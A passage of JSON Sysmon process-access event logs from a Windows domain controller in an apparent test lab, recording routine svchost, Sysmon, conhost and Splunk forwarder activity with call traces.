07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.752\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-00107A600300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3844\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B9610300}\r\nTargetProcessId: 3860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.752","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-00107A600300}","SourceProcessId":"3824","SourceThreadId":"3844","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B9610300}","TargetProcessId":"3860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
